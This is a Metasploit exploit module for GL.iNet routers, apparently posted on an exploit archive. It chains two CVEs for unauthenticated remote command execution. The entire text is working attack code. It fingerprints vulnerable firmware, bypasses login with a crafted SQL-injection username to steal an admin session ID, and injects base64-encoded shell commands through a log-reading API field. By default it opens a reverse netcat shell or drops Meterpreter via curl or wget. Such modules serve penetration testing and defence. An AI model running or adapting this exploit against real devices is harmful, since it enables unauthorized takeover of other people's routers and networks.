GL.iNet Unauthenticated Remote Command Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'digest/md5'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'GL.iNet Unauthenticated Remote Command Execution via the logread module.',  
'Description' => %q{  
A command injection vulnerability exists in multiple GL.iNet network products, allowing an attacker  
to inject and execute arbitrary shell commands via JSON parameters at the `gl_system_log` and `gl_crash_log`  
interface in the `logread` module.  
This exploit requires post-authentication using the `Admin-Token` cookie/sessionID (`SID`), typically stolen  
by the attacker.  
However, by chaining this exploit with vulnerability CVE-2023-50919, one can bypass the Nginx authentication  
through a `Lua` string pattern matching and SQL injection vulnerability. The `Admin-Token` cookie/`SID` can be  
retrieved without knowing a valid username and password.  
  
The following GL.iNet network products are vulnerable:  
- A1300, AX1800, AXT1800, MT3000, MT2500/MT2500A: v4.0.0 < v4.5.0;  
- MT6000: v4.5.0 - v4.5.3;  
- MT1300, MT300N-V2, AR750S, AR750, AR300M, AP1300, B1300: v4.3.7;  
- E750/E750V2, MV1000: v4.3.8;  
- X3000: v4.0.0 - v4.4.2;  
- XE3000: v4.0.0 - v4.4.3;  
- SFT1200: v4.3.6;  
- and potentially others (just try ;-)  
  
NOTE: Staged Meterpreter payloads might core dump on the target, so use stage-less Meterpreter payloads  
when using the Linux Dropper target.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor  
'Unknown', # Discovery of the vulnerability CVE-2023-50445  
'DZONERZY' # Discovery of the vulnerability CVE-2023-50919  
  
],  
'References' => [  
['CVE', '2023-50445'],  
['CVE', '2023-50919'],  
['URL', 'https://attackerkb.com/topics/3LmJ0d7rzC/cve-2023-50445'],  
['URL', 'https://attackerkb.com/topics/LdqSuqHKOj/cve-2023-50919'],  
['URL', 'https://libdzonerzy.so/articles/from-zero-to-botnet-glinet.html'],  
['URL', 'https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Using%20Shell%20Metacharacter%20Injection%20via%20API.md']  
],  
'DisclosureDate' => '2023-12-10',  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD, ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],  
'Privileged' => true,  
'Targets' => [  
[  
'Unix Command',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_cmd,  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_netcat'  
}  
}  
],  
[  
'Linux Dropper',  
{  
'Platform' => 'linux',  
'Arch' => [ARCH_MIPSLE, ARCH_MIPSBE, ARCH_ARMLE, ARCH_AARCH64],  
'Type' => :linux_dropper,  
'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],  
'Linemax' => 900,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp'  
}  
}  
]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
register_options([  
OptString.new('SID', [false, 'Session ID'])  
])  
end  
  
def vuln_version?  
@glinet = { 'model' => nil, 'firmware' => nil, 'arch' => nil }  
# check first with version 4.x api call  
post_data = {  
jsonrpc: '2.0',  
id: rand(1000..9999),  
method: 'call',  
params: [  
'',  
'ui',  
'check_initialized',  
{}  
]  
}.to_json  
  
res = send_request_cgi({  
'method' => 'POST',  
'ctype' => 'text/json',  
'uri' => normalize_uri(target_uri.path, 'rpc'),  
'data' => post_data.to_s  
})  
if res && res.code == 200 && res.body.include?('result')  
res_json = res.get_json_document  
unless res_json.blank?  
@glinet['model'] = res_json['result']['model']  
@glinet['firmware'] = res_json['result']['firmware_version']  
end  
else  
# check with version 3.x api call. These versions are NOT vulnerable  
res = send_request_cgi({  
'method' => 'GET',  
'ctype' => 'application/x-www-form-urlencoded',  
'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'api', 'router', 'hello')  
})  
if res && res.code == 200 && res.body.include?('model') && res.body.include?('version')  
res_json = res.get_json_document  
unless res_json.blank?  
@glinet['model'] = res_json['model']  
@glinet['firmware'] = res_json['version']  
end  
end  
end  
  
# check for the vulnerable models and firmware versions  
case @glinet['model']  
when 'sft1200'  
@glinet['arch'] = 'mipsle'  
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.6')  
when 'ar750', 'ar750s', 'ar300m', 'ar300m16'  
@glinet['arch'] = 'mipsbe'  
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')  
when 'mt300n-v2', 'mt1300'  
@glinet['arch'] = 'mipsle'  
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')  
when 'ap1300', 'b1300'  
@glinet['arch'] = 'armle'  
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.7')  
when 'e750', 'e750v2'  
@glinet['arch'] = 'mipsbe'  
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')  
when 'mv1000'  
@glinet['arch'] = 'armle'  
return Rex::Version.new(@glinet['firmware']) == Rex::Version.new('4.3.8')  
when 'ax1800', 'axt1800', 'a1300'  
@glinet['arch'] = 'armle'  
return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')  
when 'mt2500', 'mt2500a', 'mt3000'  
@glinet['arch'] = 'aarch64'  
return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.5.0')  
when 'mt6000'  
@glinet['arch'] = 'aarch64'  
return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.5.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.5.3')  
when 'x3000'  
@glinet['arch'] = 'aarch64'  
return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.2')  
when 'xe3000'  
@glinet['arch'] = 'aarch64'  
return Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0') && Rex::Version.new(@glinet['firmware']) <= Rex::Version.new('4.4.3')  
end  
@glinet['arch'] = 'n/a'  
return false  
end  
  
def auth_bypass  
# Check if datastore['SID'] is set  
return datastore['SID'] unless datastore['SID'].blank?  
  
# Exploit CVE-2023-50919 to retrieve the SID without valid username and password.  
# Send an RPC request calling the challenge method, which will return a random nonce,  
# the selected root user’s salt, and the crypt’s algorithm to hash the password.  
post_data = {  
jsonrpc: '2.0',  
id: rand(1000..9999),  
method: 'challenge',  
params: {  
username: 'root'  
}  
}.to_json  
  
res = send_request_cgi({  
'method' => 'POST',  
'ctype' => 'text/json',  
'uri' => normalize_uri(target_uri.path, 'rpc'),  
'data' => post_data.to_s  
})  
if res && res.code == 200 && res.body.include?('nonce')  
res_json = res.get_json_document  
unless res_json.blank?  
nonce = res_json['result']['nonce']  
end  
else  
fail_with(Failure::NotFound, 'Getting the random nonce failed.')  
end  
# Perform REGEX to lookup uid field from /etc/shadow to be used as password with manipulated root username  
# Use the SQL injection part to lookup the ACLs for root stored in sqlite db  
# Create the password hash which is the md5 of the concatenation of the user, password, and the retrieved nonce  
username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+"  
pw = '0'  
hash = Digest::MD5.hexdigest("#{username}:#{pw}:#{nonce}")  
  
# Login with the password hash and obtain the SessionID (SID)  
post_data = {  
jsonrpc: '2.0',  
id: rand(1000..9999),  
method: 'login',  
params: {  
username: username.to_s,  
hash: hash.to_s  
}  
}.to_json  
  
res = send_request_cgi({  
'method' => 'POST',  
'ctype' => 'text/json',  
'uri' => normalize_uri(target_uri.path, 'rpc'),  
'data' => post_data.to_s  
})  
if res && res.code == 200 && res.body.include?('sid')  
res_json = res.get_json_document  
unless res_json.blank?  
sid = res_json['result']['sid']  
end  
else  
fail_with(Failure::NotFound, 'Retrieving the SessionID (SID) failed.')  
end  
return sid  
end  
  
def execute_command(cmd, _opts = {})  
payload = Base64.strict_encode64(cmd)  
cmd = "echo #{payload}|openssl enc -base64 -d -A|sh"  
post_data = {  
jsonrpc: '2.0',  
id: rand(1000..9999),  
method: 'call',  
params: [  
@sid.to_s,  
'logread',  
'get_system_log',  
{  
lines: '',  
module: "|#{cmd}"  
}  
]  
}.to_json  
  
return send_request_cgi({  
'method' => 'POST',  
'ctype' => 'text/json',  
'cookie' => "Admin-Token=#{@sid}",  
'uri' => normalize_uri(target_uri.path, 'rpc'),  
'data' => post_data.to_s  
})  
end  
  
def check  
print_status("Checking if #{peer} can be exploited.")  
# Check if target is a GL.iNet network device and the firmware version is vulnerable  
return CheckCode::Vulnerable("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if vuln_version?  
  
unless @glinet['firmware'].nil?  
# GL.iNet network devices with firmware version 3.x that are safe from this exploit  
return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) < Rex::Version.new('4.0.0')  
  
# GL.iNet network devices with a firmware version 4.x or higher which still could be vulnerable unless the architecture is not available (n/a)  
if @glinet['arch'] != 'n/a' && (Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0'))  
return CheckCode::Safe("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}")  
end  
return CheckCode::Detected("Product info: #{@glinet['model']}|#{@glinet['firmware']}|#{@glinet['arch']}") if Rex::Version.new(@glinet['firmware']) >= Rex::Version.new('4.0.0')  
end  
# No GL.iNet network device or not reachable  
CheckCode::Unknown('No GL.iNet network device or device is not responding.')  
end  
  
def exploit  
@sid = auth_bypass  
print_status("SID: #{@sid}")  
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")  
case target['Type']  
when :unix_cmd  
execute_command(payload.encoded)  
when :linux_dropper  
# Don't check the response here since the server won't respond  
# if the payload is successfully executed.  
execute_cmdstager({ linemax: target.opts['Linemax'] })  
end  
end  
end  
`